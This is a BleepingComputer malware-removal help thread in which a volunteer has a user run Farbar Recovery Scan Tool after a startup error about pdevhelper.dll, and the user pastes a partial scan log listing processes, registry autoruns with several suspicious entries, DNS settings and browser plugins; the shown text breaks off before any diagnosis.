Jump to content


 


Register a free account to unlock additional features at BleepingComputer.com
Welcome to BleepingComputer, a free community where people like yourself come together to discuss and learn how to use their computers. Using the site is easy and fun. As a guest, you can browse and view the various discussions in the forums, but can not create a new topic or reply to an existing one unless you are logged in. Other benefits of registering an account are subscribing to topics and forums, creating a blog, and having no ads shown anywhere on the site.


Click here to Register a free account now! or read our Welcome Guide to learn how to use this site.

Photo

Weird popup on startup


  • This topic is locked This topic is locked
24 replies to this topic

#1 sirjoe1

sirjoe1

  • Members
  • 21 posts
  • OFFLINE
  •  
  • Local time:07:08 AM

Posted 09 August 2017 - 11:38 PM

As above, when I start windows and login, I get this message "The module c:/windows/system32/config/system...../pdevhelper.dll" failed to load. Its regsvr32.
Can anyone Identify this issue please?
I did google searches and got almost no results. Only something about java oracle. Thanks in advanced.



BC AdBot (Login to Remove)

 


#2 pystryker

pystryker

  • Malware Response Team
  • 730 posts
  • OFFLINE
  •  
  • Gender:Male
  • Local time:06:08 PM

Posted 10 August 2017 - 06:20 AM

Hello and welcome to Bleeping Computer! My nickname is Pystryker :) , and I will be helping you with your issue today.


Before we get started, I have a few things I need to go over with you
  • If you are receiving help for this issue at another forum, please let me know so I can close this thread.
  • Please download to and run all requested tools from your Desktop.
  • Please do not install any new software during the cleaning process other than the tools I provide for you. This can hinder the cleaning process.
  • At the top of your post, please click on the "Follow this topic" button and make sure that the "Received notification" box is checked and set to "Instantly" This will send an email to you as soon as I reply to your topic, allowing us to solve your problem faster.
  • If any of your security programs give you a warning about any tool I ask you to use, please do not worry. All the links and tools I provide to you will be safe.
  • Please do not run any tools other than the ones I ask you to, when I ask you to. Some of these tools can be very dangerous if used improperly. Also, if you use a tool that I have not requested you use, it can cause false positives, thereby delaying the complete cleaning of your machine.
  • This is a complicated process. It requires several steps, patience, and careful following of my instructions in the order they are given to diagnose your problems to get your machine back in working order.
  • Please stay with me until the end of all steps and procedures and I declare your system clean. Just because there is a lack of symptoms does not indicate a clean machine. I promise to do the same for you.
  • It is impossible for me to know what interactions may happen between your computer's software and the tools we will use to clean your machine. Therefore, I highly recommend you backup any critical personal files on your machine before we start.
  • If you have any questions at all, please don't hesitate to ask. There's no such thing as a stupid question when dealing with malware.
  • If you are unsure of an instruction I give you, or if something unexepected occurs, Do NOT proceed! Stop and ask for clarification of the instruction or tell me what occurred.
  • Please remember, the fixes are for your machine and your machine ONLY! Do not use these fixes on any other machine, each fix is tailor made for your system only. Using a fix on another machine can and will cause serious damage.
  • Once we have cleaned your machine, we'll have some cleanup and prevention steps to go through. We will also provide you with some information about how to reduce your chances of infection and get some protections in place to help defend you against this in the future
  • Please be patient while I am analyzing your logs. I know you are probably scared and very frustrated with this problem, but I am a volunteer and sometimes life does get in the way. :)
Special Note: Please know that I am against piracy in any form. This includes, but not limited to, movies, music, and software. This is also a violation of the Terms of Service you agreed to when you created your account here. If programs such as KMS that are used to activate illegal copies of Microsoft software are found, you will be asked to remove them and submit fresh logs.

Failure to do so will result in assistance being withdrawn.

Now, let's get started, shall we? :thumbsup:

Let's get a look at your system and see what's going on. :)


Scan with Farbar's Recovery Scan Tool (FRST)


Please download Farbar Recovery Scan Tool and save it to your Desktop. All tools must be run from the Desktop.

Note: You need to run the version compatible with your system. If you are not sure which version applies to your system download both of them and try to run them. Only one of them will run on your system, that will be the right version.
  • Right click to run as administrator (XP users click run after receipt of Windows Security Warning - Open File). When the tool opens click Yes to disclaimer.
  • Place a check in the box marked Addition.txt
  • Press the Scan button.
  • It will produce a log called FRST.txt in the same directory the tool is run from.
  • Please copy and paste log back here.
  • The first time the tool is run it generates another log (Addition.txt - also located in the same directory as FRST.exe/FRST64.exe). Please also paste that along with the FRST.txt into your reply.
Things I need to see in your next post:

Please post each of these logs as a separate reply in this thread.

FRST Log

Addition.txt Log

I close my topics if there is no response after 3 days. Please PM a moderator or myself to reopen your topic.

Please PM me only if I'm helping you with your computer issues and I have not responded in 2 days. Please remember, I'm a volunteer and sometimes life does get in the way. :)

Please stay with me until I declare your machine clean. Absence of symptoms does not ensure your machine is clean.

If you'd like to make a donation via Paypal, please click here.





#3 sirjoe1

sirjoe1
  • Topic Starter

  • Members
  • 21 posts
  • OFFLINE
  •  
  • Local time:07:08 AM

Posted 10 August 2017 - 07:54 AM

Hello below is the log. 

 

FRST log: Scan result of Farbar Recovery Scan Tool (FRST) (x64) Version: 09-08-2017

Ran by w7 (administrator) on DRAGON-EMPEROR (10-08-2017 20:42:22)
Running from C:\Users\w7\Downloads
Loaded Profiles: w7 (Available Profiles: w7)
Platform: Windows 7 Ultimate Service Pack 1 (X64) Language: Chinese (Simplified, PRC)
Internet Explorer Version 11 (Default browser: Chrome)
Boot Mode: Normal
 
==================== Processes (Whitelisted) =================
 
(If an entry is included in the fixlist, the process will be closed. The file will not be moved.)
 
(NVIDIA Corporation) C:\Program Files\NVIDIA Corporation\Display.NvContainer\NVDisplay.Container.exe
(NVIDIA Corporation) C:\Program Files\NVIDIA Corporation\Display\nvxdsync.exe
(BlueStack Systems, Inc.) C:\Program Files (x86)\Bluestacks\HD-LogRotatorService.exe
(ESET) C:\Program Files\ESET\ESET NOD32 Antivirus\x86\ekrn.exe
(Intel® Corporation) C:\Program Files\Intel\WiFi\bin\EvtEng.exe
(Hi-Rez Studios) C:\Program Files (x86)\Hi-Rez Studios\HiPatchService.exe
(Intel® Corporation) C:\Program Files\Intel\iCLS Client\HeciServer.exe
(乐视网信息技术(北京)股份有限公司) C:\Program Files (x86)\Letv\LeService.exe
(Synaptics Incorporated) C:\Program Files\Synaptics\SynTP\SynTPEnh.exe
(Realtek Semiconductor) C:\Program Files\Realtek\Audio\HDA\RAVCpl64.exe
(Intel Corporation) C:\Windows\System32\hkcmd.exe
(Intel Corporation) C:\Windows\System32\igfxsrvc.exe
(Intel Corporation) C:\Windows\System32\igfxpers.exe
(ESET) C:\Program Files\ESET\ESET NOD32 Antivirus\egui.exe
(Motorola Solutions, Inc.) C:\Program Files (x86)\Intel\Bluetooth\BleServicesCtrl.exe
(Microsoft Corporation) C:\Windows\System32\rundll32.exe
(Logitech Inc.) C:\Program Files\Logitech Gaming Software\LCore.exe
(Malwarebytes) C:\Program Files\Malwarebytes\Anti-Malware\mbamtray.exe
(Logitech Inc.) C:\Program Files\Logitech Gaming Software\Drivers\APOService\LogiRegistryService.exe
(Microsoft Corporation) C:\Program Files\Windows Sidebar\sidebar.exe
(Micro-Star International Co., Ltd.) C:\Windows\SysWOW64\MSIService.exe
(NVIDIA Corporation) C:\Program Files\NVIDIA Corporation\NvContainer\nvcontainer.exe
(NVIDIA Corporation) C:\Program Files\NVIDIA Corporation\GeForce Experience Service\nvwirelesscontroller.exe
(NVIDIA Corporation) C:\Program Files (x86)\NVIDIA Corporation\NvTelemetry\NvTelemetryContainer.exe
(Qualcomm Atheros) C:\Program Files\Qualcomm Atheros\Network Manager\KillerService.exe
(Intel® Corporation) C:\Program Files\Common Files\Intel\WirelessCommon\RegSrvc.exe
(SoftEther VPN Project at University of Tsukuba, Japan.) C:\Program Files\SoftEther VPN Server\vpnserver_x64.exe
(BlueStack Systems, Inc.) C:\Program Files (x86)\Bluestacks\HD-Agent.exe
(乐视网信息技术(北京)股份有限公司) C:\Program Files (x86)\Letv\LeTVLoader.exe
(乐视网信息技术(北京)股份有限公司) C:\Users\w7\AppData\Roaming\Letv\AfterPlay\AfterPlayMonitor.exe
(NVIDIA Corporation) C:\Program Files (x86)\NVIDIA Corporation\NvContainer\nvcontainer.exe
() C:\Program Files (x86)\TunnelBear\TBear.Maintenance.exe
(Intel Corporation) C:\Program Files (x86)\Intel\Intel® USB 3.0 eXtensible Host Controller Driver\Application\iusb3mon.exe
(Micro-Star International Co., Ltd.) C:\Program Files (x86)\MSI\KLM\KLM.exe
() C:\Program Files (x86)\Android_USB_Driver_Z\Bin\MonServiceUDisk.exe
(中国银联股份有限公司) C:\Windows\SysWOW64\UPEditNew\UPService.exe
(Intel® Corporation) C:\Program Files\Intel\WiFi\bin\ZeroConfigService.exe
(中国银联股份有限公司) C:\Windows\SysWOW64\UPEditNew\UPSecurityInput.exe
(Malwarebytes) C:\Program Files\Malwarebytes\Anti-Malware\MBAMService.exe
(乐视网信息技术(北京)股份有限公司) C:\Program Files (x86)\Letv\LmpDownloader.exe
(Oracle Corporation) C:\Program Files (x86)\Common Files\Java\Java Update\jusched.exe
(NVIDIA Corporation) C:\Program Files\NVIDIA Corporation\Display\nvtray.exe
(Piriform Ltd) C:\Program Files\CCleaner\CCleaner64.exe
(Synaptics Incorporated) C:\Program Files\Synaptics\SynTP\SynTPHelper.exe
(Motorola Solutions, Inc.) C:\Program Files (x86)\Intel\Bluetooth\devmonsrv.exe
(Motorola Solutions, Inc.) C:\Program Files (x86)\Intel\Bluetooth\obexsrv.exe
(Motorola Solutions, Inc.) C:\Program Files (x86)\Intel\Bluetooth\mediasrv.exe
(Node.js) C:\Program Files (x86)\NVIDIA Corporation\NvNode\NVIDIA Web Helper.exe
(Intel Corporation) C:\Program Files (x86)\Intel\Intel® Management Engine Components\DAL\jhi_service.exe
(Intel Corporation) C:\Program Files (x86)\Intel\Intel® Management Engine Components\LMS\LMS.exe
(Youku.com) C:\Users\w7\AppData\Roaming\ytmediacenter\ikuacc.exe
(Microsoft Corporation) C:\Windows\System32\wlanext.exe
(Strong Technology, LLC) C:\Program Files (x86)\StrongVPN\StrongDial.exe
(Google Inc.) C:\Program Files (x86)\Google\Chrome\Application\chrome.exe
(Google Inc.) C:\Program Files (x86)\Google\Chrome\Application\chrome.exe
(Google Inc.) C:\Program Files (x86)\Google\Chrome\Application\chrome.exe
(Google Inc.) C:\Program Files (x86)\Google\Chrome\Application\chrome.exe
(Google Inc.) C:\Program Files (x86)\Google\Chrome\Application\chrome.exe
(Google Inc.) C:\Program Files (x86)\Google\Chrome\Application\chrome.exe
(Google Inc.) C:\Program Files (x86)\Google\Chrome\Application\chrome.exe
(Google Inc.) C:\Program Files (x86)\Google\Chrome\Application\chrome.exe
(Google Inc.) C:\Program Files (x86)\Google\Chrome\Application\chrome.exe
(VideoLAN) C:\Program Files\VideoLAN\VLC\vlc.exe
(Google Inc.) C:\Program Files (x86)\Google\Chrome\Application\chrome.exe
(Duodian Technology Co. Ltd.) C:\Users\w7\AppData\Roaming\Nox\bin\Nox.exe
(BigNox Corporation) C:\Program Files\Bignox\BigNoxVM\RT\NoxVMSVC.exe
() C:\Program Files\Bignox\BigNoxVM\RT\NoxVMHandle.exe
() C:\Users\w7\AppData\Roaming\Nox\bin\nox_adb.exe
(Google Inc.) C:\Program Files (x86)\Google\Chrome\Application\chrome.exe
(Google Inc.) C:\Program Files (x86)\Google\Chrome\Application\chrome.exe
(Google Inc.) C:\Program Files (x86)\Google\Chrome\Application\chrome.exe
(Google Inc.) C:\Program Files (x86)\Google\Chrome\Application\chrome.exe
(Google Inc.) C:\Program Files (x86)\Google\Chrome\Application\chrome.exe
(Microsoft Corporation) C:\Windows\System32\taskmgr.exe
(Google Inc.) C:\Program Files (x86)\Google\Chrome\Application\chrome.exe
(Google Inc.) C:\Program Files (x86)\Google\Chrome\Application\chrome.exe
 
==================== Registry (Whitelisted) ====================
 
(If an entry is included in the fixlist, the registry item will be restored to default or removed. The file will not be moved.)
 
HKLM\...\Run: [RTHDVCPL] => C:\Program Files\Realtek\Audio\HDA\RAVCpl64.exe [13667032 2014-01-22] (Realtek Semiconductor)
HKLM\...\Run: [egui] => C:\Program Files\ESET\ESET NOD32 Antivirus\egui.exe [5581888 2014-02-24] (ESET)
HKLM\...\Run: [BLEServicesCtrl] => C:\Program Files (x86)\Intel\Bluetooth\BleServicesCtrl.exe [184632 2013-11-13] (Motorola Solutions, Inc.)
HKLM\...\Run: [BTMTrayAgent] => rundll32.exe "C:\Program Files (x86)\Intel\Bluetooth\btmshellex.dll",TrayApp
HKLM\...\Run: [Launch LCore] => C:\Program Files\Logitech Gaming Software\LCore.exe [16293496 2016-09-30] (Logitech Inc.)
HKLM\...\Run: [ShadowPlay] => "C:\Windows\system32\rundll32.exe" C:\Windows\system32\nvspcap64.dll,ShadowPlayOnSystemStart
HKLM\...\Run: [Malwarebytes TrayApp] => C:\PROGRAM FILES\MALWAREBYTES\ANTI-MALWARE\mbamtray.exe [3146704 2017-05-09] (Malwarebytes)
HKLM-x32\...\Run: [USB3MON] => C:\Program Files (x86)\Intel\Intel® USB 3.0 eXtensible Host Controller Driver\Application\iusb3mon.exe [292848 2013-08-15] (Intel Corporation)
HKLM-x32\...\Run: [KLM] => C:\Program Files (x86)\MSI\KLM\KLM.exe [1567624 2013-05-31] (Micro-Star International Co., Ltd.)
HKLM-x32\...\Run: [BCSSync] => C:\Program Files (x86)\Microsoft Office\Office14\BCSSync.exe [91520 2010-03-13] (Microsoft Corporation)
HKLM-x32\...\Run: [URPmedia] => C:\Windows\SysWOW64\regsvr32.exe C:\Windows\system32\config\systemprofile\AppData\Local\Ofics\pdevhelper.dll
HKLM-x32\...\Run: [SunJavaUpdateSched] => C:\Program Files (x86)\Common Files\Java\Java Update\jusched.exe [587288 2017-07-21] (Oracle Corporation)
Winlogon\Notify\igfxcui: C:\Windows\SYSTEM32\igfxdev.dll (Intel Corporation)
HKLM\SOFTWARE\Policies\Microsoft\Windows Defender: Restriction <==== ATTENTION
HKU\S-1-5-21-1997723473-3802709511-3419621205-1000\...\Run: [CCleaner Monitoring] => C:\Program Files\CCleaner\CCleaner64.exe [6482200 2014-09-26] (Piriform Ltd)
HKU\S-1-5-21-1997723473-3802709511-3419621205-1000\...\Run: [StrongVPN Client] => C:\Program Files (x86)\StrongVPN\StrongDial.exe [1679768 2017-08-07] (Strong Technology, LLC)
HKU\S-1-5-21-1997723473-3802709511-3419621205-1000\...\Run: [ctfmon] => C:\Windows\system32\ctfmon.exe [9728 2009-07-14] (Microsoft Corporation)
HKU\S-1-5-21-1997723473-3802709511-3419621205-1000\...\Run: [BlueStacks Agent] => C:\Program Files (x86)\Bluestacks\HD-Agent.exe [970264 2016-06-14] (BlueStack Systems, Inc.)
HKU\S-1-5-21-1997723473-3802709511-3419621205-1000\...\Run: [Loader] => C:\Program Files (x86)\Letv\LeTVLoader.exe [2261936 2017-02-16] (乐视网信息技术(北京)股份有限公司)
HKU\S-1-5-21-1997723473-3802709511-3419621205-1000\...\Run: [AfterPlayMonitor] => C:\Users\w7\AppData\Roaming\Letv\AfterPlay\AfterPlayMonitor.ex
HKU\S-1-5-21-1997723473-3802709511-3419621205-1000\...\Run: [Microsoft Update] => C:\Users\w7\AppData\Local\Microsoft Windows\svchost.exe <==== ATTENTION
HKU\S-1-5-21-1997723473-3802709511-3419621205-1000\...\MountPoints2: {0764306c-c594-11e4-846a-a0a8cdde279a} - I:\Setup.exe
HKU\S-1-5-21-1997723473-3802709511-3419621205-1000\...\MountPoints2: {1a98ae99-e609-11e5-8358-a0a8cdde279e} - J:\Setup.exe
HKU\S-1-5-21-1997723473-3802709511-3419621205-1000\...\MountPoints2: {2b0eb1c4-2e1a-11e7-b884-a0a8cdde279e} - L:\Setup.exe /s
HKU\S-1-5-21-1997723473-3802709511-3419621205-1000\...\MountPoints2: {2b0eb1f1-2e1a-11e7-b884-a0a8cdde279e} - L:\Setup.exe
HKU\S-1-5-21-1997723473-3802709511-3419621205-1000\...\MountPoints2: {2b0eb201-2e1a-11e7-b884-a0a8cdde279e} - I:\Setup.exe
HKU\S-1-5-21-1997723473-3802709511-3419621205-1000\...\MountPoints2: {2b0eb205-2e1a-11e7-b884-a0a8cdde279e} - I:\Setup.exe
HKU\S-1-5-21-1997723473-3802709511-3419621205-1000\...\MountPoints2: {3e4ebb45-ea13-11e6-b566-a0a8cdde279e} - C:\Windows\system32\RunDLL32.EXE Shell32.DLL,ShellExec_RunDLL I:\autorun.exe /auto
HKU\S-1-5-21-1997723473-3802709511-3419621205-1000\...\MountPoints2: {3e4ebb61-ea13-11e6-b566-a0a8cdde279e} - C:\Windows\system32\RunDLL32.EXE Shell32.DLL,ShellExec_RunDLL L:\autorun.exe /auto
HKU\S-1-5-21-1997723473-3802709511-3419621205-1000\...\MountPoints2: {3e4ebb74-ea13-11e6-b566-a0a8cdde279e} - C:\Windows\system32\RunDLL32.EXE Shell32.DLL,ShellExec_RunDLL L:\autorun.exe /auto
HKU\S-1-5-21-1997723473-3802709511-3419621205-1000\...\MountPoints2: {4db061a9-503f-11e7-b4a9-a0a8cdde279e} - L:\OPPODriver.exe
HKU\S-1-5-21-1997723473-3802709511-3419621205-1000\...\MountPoints2: {50fe49dc-23eb-11e5-9f9c-a0a8cdde279e} - J:\Setup.exe /s
HKU\S-1-5-21-1997723473-3802709511-3419621205-1000\...\MountPoints2: {72c8e6e0-d712-11e5-8a92-a0a8cdde279e} - J:\Setup.exe /s
HKU\S-1-5-21-1997723473-3802709511-3419621205-1000\...\MountPoints2: {798c261b-5bb1-11e7-a7c7-a0a8cdde279e} - C:\Windows\system32\RunDLL32.EXE Shell32.DLL,ShellExec_RunDLL I:\autorun.exe /auto
HKU\S-1-5-21-1997723473-3802709511-3419621205-1000\...\MountPoints2: {798c2667-5bb1-11e7-a7c7-a0a8cdde279e} - C:\Windows\system32\RunDLL32.EXE Shell32.DLL,ShellExec_RunDLL I:\autorun.exe /auto
HKU\S-1-5-21-1997723473-3802709511-3419621205-1000\...\MountPoints2: {7d9b032c-7627-11e4-b95e-a0a8cdde279a} - H:\Setup.exe /s
HKU\S-1-5-21-1997723473-3802709511-3419621205-1000\...\MountPoints2: {8654e362-34c1-11e4-af85-a0a8cdde279e} - I:\Setup.exe
HKU\S-1-5-21-1997723473-3802709511-3419621205-1000\...\MountPoints2: {8a4d8128-9d80-11e4-9452-a0a8cdde279e} - I:\Setup.exe /s
HKU\S-1-5-21-1997723473-3802709511-3419621205-1000\...\MountPoints2: {8c0fd517-9cf0-11e5-b7e2-a0a8cdde279e} - I:\OPPODriver.exe
HKU\S-1-5-21-1997723473-3802709511-3419621205-1000\...\MountPoints2: {95a8c3ae-0c24-11e6-b041-a0a8cdde279e} - C:\Windows\system32\RunDLL32.EXE Shell32.DLL,ShellExec_RunDLL J:\autorun.exe /auto
HKU\S-1-5-21-1997723473-3802709511-3419621205-1000\...\MountPoints2: {95a8c3af-0c24-11e6-b041-a0a8cdde279e} - C:\Windows\system32\RunDLL32.EXE Shell32.DLL,ShellExec_RunDLL K:\autorun.exe /auto
HKU\S-1-5-21-1997723473-3802709511-3419621205-1000\...\MountPoints2: {c369952c-baa7-11e6-9fa5-a0a8cdde279e} - M:\OPPODriver.exe
HKU\S-1-5-21-1997723473-3802709511-3419621205-1000\...\MountPoints2: {d68e90f2-9efd-11e4-82cf-a0a8cdde279e} - H:\Setup.exe
HKU\S-1-5-21-1997723473-3802709511-3419621205-1000\...\MountPoints2: {e18949df-86cc-11e6-8f36-a0a8cdde279e} - C:\Windows\system32\RunDLL32.EXE Shell32.DLL,ShellExec_RunDLL K:\autorun.exe /auto
HKU\S-1-5-21-1997723473-3802709511-3419621205-1000\...\MountPoints2: {e18949ed-86cc-11e6-8f36-a0a8cdde279e} - C:\Windows\system32\RunDLL32.EXE Shell32.DLL,ShellExec_RunDLL I:\autorun.exe /auto
HKU\S-1-5-21-1997723473-3802709511-3419621205-1000\...\MountPoints2: {fea0655e-0ea3-11e7-9986-a0a8cdde279e} - I:\OPPODriver.exe
HKU\S-1-5-18\...\RunOnce: [zZHILNIspz] => C:\Windows\system32\config\SYSTEM~1\AppData\Local\BJIHIW~1\wssvc.exe
HKU\S-1-5-18\...\RunOnce: [AxGfMIQkjR] => C:\Windows\system32\config\SYSTEM~1\AppData\Local\DSHCAJ~1\winsvc.exe
AppInit_DLLs: C:\Windows\system32\nvinitx.dll => C:\Windows\system32\nvinitx.dll [170688 2016-12-12] (NVIDIA Corporation)
AppInit_DLLs-x32: C:\Windows\SysWOW64\nvinit.dll => C:\Windows\SysWOW64\nvinit.dll [148016 2016-12-12] (NVIDIA Corporation)
GroupPolicy: Restriction - Chrome <==== ATTENTION
 
==================== Internet (Whitelisted) ====================
 
(If an item is included in the fixlist, if it is a registry item it will be removed or restored to default.)
 
Hosts: There are more than one entry in Hosts. See Hosts section of Addition.txt
Tcpip\Parameters: [DhcpNameServer] 221.7.128.68 221.7.136.68
Tcpip\..\Interfaces\{168F3B28-679A-46FB-83CB-2404F670B8AB}: [DhcpNameServer] 221.7.128.68 221.7.136.68
Tcpip\..\Interfaces\{19AAC75B-C9BB-40F5-B8E4-7268E604A409}: [NameServer] 8.8.8.8,8.8.8.4
Tcpip\..\Interfaces\{19AAC75B-C9BB-40F5-B8E4-7268E604A409}: [DhcpNameServer] 192.168.42.129
Tcpip\..\Interfaces\{4866F1B2-4599-4CC6-ACEC-9C54CB433C6D}: [NameServer] 199.21.151.42 199.21.151.25
Tcpip\..\Interfaces\{4C452996-EFBA-4FFA-8B3F-CE5C40B3228F}: [NameServer] 216.169.129.2 216.169.130.2
Tcpip\..\Interfaces\{588E39E7-0D93-4F7B-8963-12BC0DB30CA2}: [DhcpNameServer] 192.168.1.5 202.103.224.68
Tcpip\..\Interfaces\{CF52435F-F85E-4754-9F57-4925D2553590}: [NameServer] 193.138.228.127 91.148.254.5
 
Internet Explorer:
==================
SearchScopes: HKU\.DEFAULT -> DefaultScope {0633EE93-D776-472f-A0FF-E1416B8B2E3A} URL = 
SearchScopes: HKU\S-1-5-21-1997723473-3802709511-3419621205-1000 -> DefaultScope {828B376B-F2F6-4778-928C-E29EC877535E} URL = hxxp://www.google.com/cse?cx=partner-pub-0900663996874144:6813731868&ie=UTF-8&q={searchTerms}&sa=Search&ref=#gsc.tab=0&gsc.q={searchTerms}&gsc.page=1
SearchScopes: HKU\S-1-5-21-1997723473-3802709511-3419621205-1000 -> {828B376B-F2F6-4778-928C-E29EC877535E} URL = hxxp://www.google.com/cse?cx=partner-pub-0900663996874144:6813731868&ie=UTF-8&q={searchTerms}&sa=Search&ref=#gsc.tab=0&gsc.q={searchTerms}&gsc.page=1
BHO: YoukuEyeOnIE64 Class -> {509DC5B8-F673-4102-B86E-5BF20BF4EE54} -> C:\Users\w7\AppData\Roaming\ytmediacenter\X64\ykcool64.dll [2015-12-25] (Youku.com)
BHO: Office Document Cache Handler -> {B4F3A835-0E21-4959-BA22-42B3008E02FF} -> C:\Program Files\Microsoft Office\Office14\URLREDIR.DLL [2010-02-28] (Microsoft Corporation)
BHO-x32: Java™ Plug-In SSV Helper -> {761497BB-D6F0-462C-B6EB-D4DAF1D92D43} -> C:\Program Files (x86)\Java\jre1.8.0_144\bin\ssv.dll [2017-08-07] (Oracle Corporation)
BHO-x32: YoukuEyeOnIE Class -> {7DC4B5B6-C122-44C4-825C-B310513A47CB} -> C:\Users\w7\AppData\Roaming\ytmediacenter\ykcool.dll [2015-12-25] (Youku.com)
BHO-x32: Office Document Cache Handler -> {B4F3A835-0E21-4959-BA22-42B3008E02FF} -> C:\Program Files (x86)\Microsoft Office\Office14\URLREDIR.DLL [2010-02-28] (Microsoft Corporation)
BHO-x32: SpeedBit Link Verification Helper -> {D5974A72-C81C-4DC3-BE77-A8A7BBC8864E} -> C:\Program Files (x86)\DAP\LinkVerifier.dll => No File
BHO-x32: Java™ Plug-In 2 SSV Helper -> {DBC80044-A445-435b-BC74-9C25C1C588A9} -> C:\Program Files (x86)\Java\jre1.8.0_144\bin\jp2ssv.dll [2017-08-07] (Oracle Corporation)
 
FireFox:
========
FF DefaultProfile: gpvajf5u.default
FF DefaultProfile: feefnn2u.default-1439732963054-1502179100800
FF ProfilePath: C:\Users\w7\AppData\Roaming\Mozilla\icecat\Profiles\gpvajf5u.default [2017-08-02]
FF Extension: (IceCatHome) - C:\Program Files\icecat\browser\extensions\abouticecat@gnu.org [2017-08-01] [not signed]
FF Extension: (HTTPS-Everywhere) - C:\Program Files\icecat\browser\extensions\https-everywhere-eff@eff.org [2017-08-01]
FF ProfilePath: C:\Users\w7\AppData\Roaming\Mozilla\Firefox\Profiles\feefnn2u.default-1439732963054-1502179100800 [2017-08-10]
FF HKLM-x32\...\Firefox\Extensions: [daplinkchecker@speedbit.com] - C:\Program Files (x86)\DAP\daplinkchecker => not found
FF HKLM-x32\...\Thunderbird\Extensions: [eplgTb@eset.com] - C:\Program Files\ESET\ESET NOD32 Antivirus\Mozilla Thunderbird
FF Extension: (ESET Smart Security Extension) - C:\Program Files\ESET\ESET NOD32 Antivirus\Mozilla Thunderbird [2014-09-06] [not signed]
FF HKU\S-1-5-21-1997723473-3802709511-3419621205-1000\...\Firefox\Extensions: [{F17C1572-C9EC-4e5c-A542-D05CBB5C5A08}] - C:\Program Files (x86)\DAP\DAPFireFox => not found
FF Plugin: @adobe.com/FlashPlayer -> C:\Windows\system32\Macromed\Flash\NPSWF64_26_0_0_151.dll [2017-08-09] ()
FF Plugin: @microsoft.com/GENUINE -> disabled [No File]
FF Plugin: @microsoft.com/OfficeAuthz,version=14.0 -> C:\PROGRA~1\MICROS~2\Office14\NPAUTHZ.DLL [2010-01-09] (Microsoft Corporation)
FF Plugin: @videolan.org/vlc,version=2.2.4 -> C:\Program Files\VideoLAN\VLC\npvlc.dll [2016-06-01] (VideoLAN)
FF Plugin: adobe.com/AdobeAAMDetect -> C:\Program Files (x86)\Common Files\Adobe\OOBE\PDApp\CCM\Utilities\npAdobeAAMDetect64.dll [No File]
FF Plugin-x32: @adobe.com/FlashPlayer -> C:\Windows\SysWOW64\Macromed\Flash\NPSWF32_26_0_0_151.dll [2017-08-09] ()
FF Plugin-x32: @baidu.com/YunWebDetectPlugin -> C:\Users\w7\AppData\Roaming\baidu\BaiduNetdisk\npYunWebDetect.dll [2017-05-18] (Baidu.com, Inc.)
FF Plugin-x32: @cfca.com/SecEditCtl.BOC,version=1.0.0.9 -> C:\Windows\system32\npSecEditCtl.BOC.x86.dll [No File]
FF Plugin-x32: @intel-webapi.intel.com/Intel WebAPI ipt;version=4.0.5 -> C:\Program Files (x86)\Intel\Intel® Management Engine Components\IPT\npIntelWebAPIIPT.dll [2013-12-09] (Intel Corporation)
FF Plugin-x32: @intel-webapi.intel.com/Intel WebAPI updater -> C:\Program Files (x86)\Intel\Intel® Management Engine Components\IPT\npIntelWebAPIUpdater.dll [2013-12-09] (Intel Corporation)
FF Plugin-x32: @java.com/DTPlugin,version=11.144.2 -> C:\Program Files (x86)\Java\jre1.8.0_144\bin\dtplugin\npDeployJava1.dll [2017-08-07] (Oracle Corporation)
FF Plugin-x32: @java.com/JavaPlugin,version=11.144.2 -> C:\Program Files (x86)\Java\jre1.8.0_144\bin\plugin2\npjp2.dll [2017-08-07] (Oracle Corporation)
FF Plugin-x32: @microsoft.com/GENUINE -> disabled [No File]
FF Plugin-x32: @microsoft.com/OfficeAuthz,version=14.0 -> C:\PROGRA~2\MICROS~2\Office14\NPAUTHZ.DLL [2010-01-09] (Microsoft Corporation)
FF Plugin-x32: @microsoft.com/SharePoint,version=14.0 -> C:\PROGRA~2\MICROS~2\Office14\NPSPWRAP.DLL [2010-03-24] (Microsoft Corporation)
FF Plugin-x32: @nexon.net/NxGame -> C:\ProgramData\NexonUS\NGM\npNxGameUS.dll [2015-08-09] (Nexon)
FF Plugin-x32: @nvidia.com/3DVision -> C:\Program Files (x86)\NVIDIA Corporation\3D Vision\npnv3dv.dll [2016-12-12] (NVIDIA Corporation)
FF Plugin-x32: @nvidia.com/3DVisionStreaming -> C:\Program Files (x86)\NVIDIA Corporation\3D Vision\npnv3dvstreaming.dll [2016-12-12] (NVIDIA Corporation)
FF Plugin-x32: @tiancity.com/NxGame -> \NGM\npNxGameCN.dll [No File]
FF Plugin-x32: @tools.google.com/Google Update;version=3 -> C:\Program Files (x86)\Google\Update\1.3.33.5\npGoogleUpdate3.dll [2017-04-29] (Google Inc.)
FF Plugin-x32: @tools.google.com/Google Update;version=9 -> C:\Program Files (x86)\Google\Update\1.3.33.5\npGoogleUpdate3.dll [2017-04-29] (Google Inc.)
FF Plugin-x32: @videolan.org/vlc,version=2.1.5 -> C:\Program Files (x86)\VideoLAN\VLC\npvlc.dll [2016-06-01] (VideoLAN)
FF Plugin-x32: @videolan.org/vlc,version=2.2.1 -> C:\Program Files (x86)\VideoLAN\VLC\npvlc.dll [2016-06-01] (VideoLAN)
FF Plugin-x32: @videolan.org/vlc,version=2.2.4 -> C:\Program Files (x86)\VideoLAN\VLC\npvlc.dll [2016-06-01] (VideoLAN)
FF Plugin-x32: adobe.com/AdobeAAMDetect -> C:\Program Files (x86)\Common Files\Adobe\OOBE\PDApp\CCM\Utilities\npAdobeAAMDetect32.dll [No File]
FF Plugin HKU\S-1-5-21-1997723473-3802709511-3419621205-1000: @my.com/Games -> C:\Users\w7\AppData\Local\MyComGames\NPMyComDetector.dll [2017-05-15] (MY.COM B.V.)
FF Plugin HKU\S-1-5-21-1997723473-3802709511-3419621205-1000: none.com/Base -> C:\Program Files (x86)\Letv\npBase.dll [2017-02-16] (letv)
FF Plugin HKU\S-1-5-21-1997723473-3802709511-3419621205-1000: youku.com/YoukuAgent -> C:\Users\w7\AppData\Roaming\ytmediacenter\npYoukuAgent.dll [2016-08-24] (Youku)
FF Plugin HKU\S-1-5-21-1997723473-3802709511-3419621205-1000: youku.com/YoukuAgent_x86_64 -> C:\Users\w7\AppData\Roaming\ytmediacenter\X64\npYoukuAgent_x64.dll [2016-08-24] (Youku)
 
Chrome: 
=======
CHR DefaultProfile: Default
CHR HomePage: Default -> hxxps://www.yahoo.com/
CHR StartupUrls: Default -> "hxxps://www.yahoo.com/"
CHR DefaultSearchURL: Default -> hxxps://search.yahoo.com/search?p={searchTerms}&fr=opensearch
CHR DefaultSearchKeyword: Default -> yahoo.com
